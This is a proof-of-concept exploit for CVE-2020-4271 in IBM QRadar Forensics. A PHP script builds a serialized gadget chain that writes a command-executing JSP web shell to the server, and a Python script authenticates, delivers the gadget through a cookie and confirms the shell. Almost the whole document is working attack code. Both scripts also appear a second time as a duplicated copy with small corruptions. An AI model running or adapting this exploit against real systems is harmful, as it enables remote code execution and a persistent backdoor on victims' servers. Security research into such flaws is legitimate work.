PHP object injection vulnerability in QRadar Forensics web application (CVE-2020-4271) proof of concept

## pop_chain.php
<?php
include("/opt/ibm/forensics/html/includes/license.inc.php");
include("/opt/ibm/forensics/html/includes/simple_html_dom.php");

$jsp = <<<__EOF
<!DOCTYPE html>
<html>
<pre>
<%@page import="java.util.*,java.io.*"%>
<% if (request.getParameter("c") != null) {
   Process p = Runtime.getRuntime().exec(request.getParameter("c"));
   DataInputStream dis = new DataInputStream(p.getInputStream());
   String disr = dis.readLine();
   while(disr != null) {
      out.println(disr);
      disr = dis.readLine();
   }
   p.destroy();
} %>
</pre>
</html>
__EOF;

$license = new License();
$class = new ReflectionClass('License');
$property = $class->getProperty('license_util');
$property->setAccessible(true);
$property->setValue($license, 'echo ' . base64_encode($jsp) .
   '|base64 -d > /opt/qradar/webapps/console/core/jsp/DisplayException.jsp #');
$property = $class->getProperty('license_file');
$property->setAccessible(true);
$property->setValue($license, '/etc/passwd');

$dom = (object)array('callback' => array($license, 'get_license_info'),
   'nodes' => array());
$node = new simple_html_dom_node($dom);

$object = (object)array('dataset' => array($node),
   'countTotal' => 1);
echo base64_encode(gzcompress(serialize($object)));

## qradar_php_object_injection.py
#!/usr/bin/env python3
import urllib3
import requests
import urllib.parse
from requests.cookies import cookiejar_from_dict

base_url=f'https://127.0.0.1/'
username='admin'
password='initial'
verifycert=False

gadget = """eJyFVG1z4jYQzk9hfB87LTbguyCmnQlO7BgoCa8Gf2FkSbEFsqVDoo4vzX/vCpLJ9Xoz9YwtaffZ
Z/extHpA18jRhgYCa+2gDnrR6AtyKDZYM+MMMPLQC0fu4AF1XEDyUgm2K0wpdlSWu0pS5gAFRAGP
XZlGMWfAUXegURc5BucOzHowY8/mbYqNOVpqF728ngNJwQU9surD6F/Y9IflM3IUBgyQTIHGQ87u
w9kB/NXPiruCiQPF/1elTYuFyDA5WJ7Ou0xQP+GEVRqE9SywA6mu3kxX4jLuToYLq8a/7iOHkUK2
HoPwbulOV8l6GMZR4WZJ/Uuwf5Y08vRjLq/J/UjYcbQa1tuEijgShkT9ht66HJdhZ7vwPRoJPeFS
v61V1vS+xnwFPLXFl3FQNOkm9NLN1J2UVNBwWJAyNOlmLgjP+baJVRzc9ePI97KoVvG9zoNczEjZ
30PMt/j+Jn9cDBc08V2ceOLCMfKyaq6yZCXHC1+waL0fQ61ksxakOzulnbW7isJmC3garZtxMNrH
/KAeajmaR6G7XYkTuQdMd96kSWjiaK5Ic2NrELQZ3m0382KR+DXdzJcUeLeJK0ngV1DzKKuGHg2n
LinXRbbI1Xipx8HarsUpbYYHvJk28a2bp5H4Nqls7PxPnPhiHBy+gK4uhv+VLooL7t+6x8FM/EU3
M6htpECfzvgFd84xE//H3Ye3npTwX0FX1j1IG/e0uDnv4aQ7bNJlb/wY9N/39/e/M+iYz73Wr7T1
R6stlWl/PWKKj+2aZVgp3Say0lIwGI+svdeqfcu1Eri5eyZMGS6r38DY+mRP1U+P3BMXzDo9cLaZ
IW0Fh7mmZ9P1d/gSP+9Omh21bUPPtXS9H9xQSsWIzfkOeoWvJYIuy5nZvefk1ZN0Bj/049uNcIQe
f4UHouBmIPJUmaU0WJwZB6//ADwxcW4="""

if not verifycert:
   urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

response = requests.get(f'{base_url}console/',
      verify=verifycert, allow_redirects=False,
      auth=requests.auth.HTTPBasicAuth(username, password))

if response.status_code != 302:
   print(f"failed login as '{username}'")
   exit(1)

cookies = cookiejar_from_dict({'serialized': urllib.parse.quote(gadget),
   'SEC': response.cookies['SEC'], 'QRIF': response.cookies['SEC']})
headers = {'Referer': f'{base_url}forensics/'}
url = f'{base_url}forensics/graphs.php?chart=WebSiteChart&output_image=1&dkey[]=serialized&dsize={len(gadget)}'
response = requests.get(url, verify=verifycert, cookies=cookies, headers=headers)

if response.status_code == 500:
   url = f'{base_url}console/core/jsp/DisplayException.jsp?c=id'
   response = requests.get(url, verify=verifycert)
   if response.status_code == 200 and 'uid=99(nobody) gid=99(nobody) groups=99(nobody)' in response.text:
      print(f'[!] successfully deployed JSP shell at: {url}')
	<?php
	include("/opt/ibm/forensics/html/includes/license.inc.php");
	include("/opt/ibm/forensics/html/includes/simple_html_dom.php");

	$jsp = <<<__EOF
	<!DOCTYPE html>
	<html>
	<pre>
	<%@page import="java.util.,java.io."%>
	<% if (request.getParameter("c") != null) {
	Process p = Runtime.getRuntime().exec(request.getParameter("c"));
	DataInputStream dis = new DataInputStream(p.getInputStream());
	String disr = dis.readLine();
	while(disr != null) {
	out.println(disr);
	disr = dis.readLine();
	}
	p.destroy();
	} %>
	</pre>
	</html>
	__EOF;

	$license = new License();
	$class = new ReflectionClass('License');
	$property = $class->getProperty('license_util');
	$property->setAccessible(true);
	$property->setValue($license, 'echo ' . base64_encode($jsp) .
	'\|base64 -d > /opt/qradar/webapps/console/core/jsp/DisplayException.jsp #');
	$property = $class->getProperty('license_file');
	$property->setAccessible(true);
	$property->setValue($license, '/etc/passwd');

	$dom = (object)array('callback' => array($license, 'get_license_info'),
	'nodes' => array());
	$node = new simple_html_dom_node($dom);

	$object = (object)array('dataset' => array($node),
	'countTotal' => 1);
	echo base64_encode(gzcompress(serialize($object)));
	#!/usr/bin/env python3
	import urllib3
	import requests
	import urllib.parse
	from requests.cookies import cookiejar_from_dict

	base_url=f'https://127.0.0.1/'
	username='admin'
	password='initial'
	verifycert=False

	gadget = """eJyFVG1z4jYQzk9hfB87LTbguyCmnQlO7BgoCa8Gf2FkSbEFsqVDoo4vzX/vCpLJ9Xoz9YwtaffZ
	Z/extHpA18jRhgYCa+2gDnrR6AtyKDZYM+MMMPLQC0fu4AF1XEDyUgm2K0wpdlSWu0pS5gAFRAGP
	XZlGMWfAUXegURc5BucOzHowY8/mbYqNOVpqF728ngNJwQU9surD6F/Y9IflM3IUBgyQTIHGQ87u
	w9kB/NXPiruCiQPF/1elTYuFyDA5WJ7Ou0xQP+GEVRqE9SywA6mu3kxX4jLuToYLq8a/7iOHkUK2
	HoPwbulOV8l6GMZR4WZJ/Uuwf5Y08vRjLq/J/UjYcbQa1tuEijgShkT9ht66HJdhZ7vwPRoJPeFS
	v61V1vS+xnwFPLXFl3FQNOkm9NLN1J2UVNBwWJAyNOlmLgjP+baJVRzc9ePI97KoVvG9zoNczEjZ
	30PMt/j+Jn9cDBc08V2ceOLCMfKyaq6yZCXHC1+waL0fQ61ksxakOzulnbW7isJmC3garZtxMNrH
	/KAeajmaR6G7XYkTuQdMd96kSWjiaK5Ic2NrELQZ3m0382KR+DXdzJcUeLeJK0ngV1DzKKuGHg2n
	LinXRbbI1Xipx8HarsUpbYYHvJk28a2bp5H4Nqls7PxPnPhiHBy+gK4uhv+VLooL7t+6x8FM/EU3
	M6htpECfzvgFd84xE//H3Ye3npTwX0FX1j1IG/e0uDnv4aQ7bNJlb/wY9N/39/e/M+iYz73Wr7T1
	R6stlWl/PWKKj+2aZVgp3Say0lIwGI+svdeqfcu1Eri5eyZMGS6r38DY+mRP1U+P3BMXzDo9cLaZ
	IW0Fh7mmZ9P1d/gSP+9Omh21bUPPtXS9H9xQSsWIzfkOeoWvJYIuy5nZvefk1ZN0Bj/049uNcIQe
	f4UHouBmIPJUmaU0WJwZB6//ADwxcW4="""

	if not verifycert:
	urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

	response = requests.get(f'{base_url}console/',
	verify=verifycert, allow_redirects=False,
	auth=requests.auth.HTTPBasicAuth(username, password))

	if response.status_code != 302:
	print(f"failed login as '{username}'")
	exit(1)

	cookies = cookiejar_from_dict({'serialized': urllib.parse.quote(gadget),
	'SEC': response.cookies['SEC'], 'QRIF': response.cookies['SEC']})
	headers = {'Referer': f'{base_url}forensics/'}
	url = f'{base_url}forensics/graphs.php?chart=WebSiteChart&output_image=1&dkey[]=serialized&dsize={len(gadget)}'
	response = requests.get(url, verify=verifycert, cookies=cookies, headers=headers)

	if response.status_code == 500:
	url = f'{base_url}console/core/jsp/DisplayException.jsp?c=id'
	response = requests.get(url, verify=verifycert)
	if response.status_code == 200 and 'uid=99(nobody) gid=99(nobody) groups=99(nobody)' in response.text:
	print(f'[!] successfully deployed JSP shell at: {url}')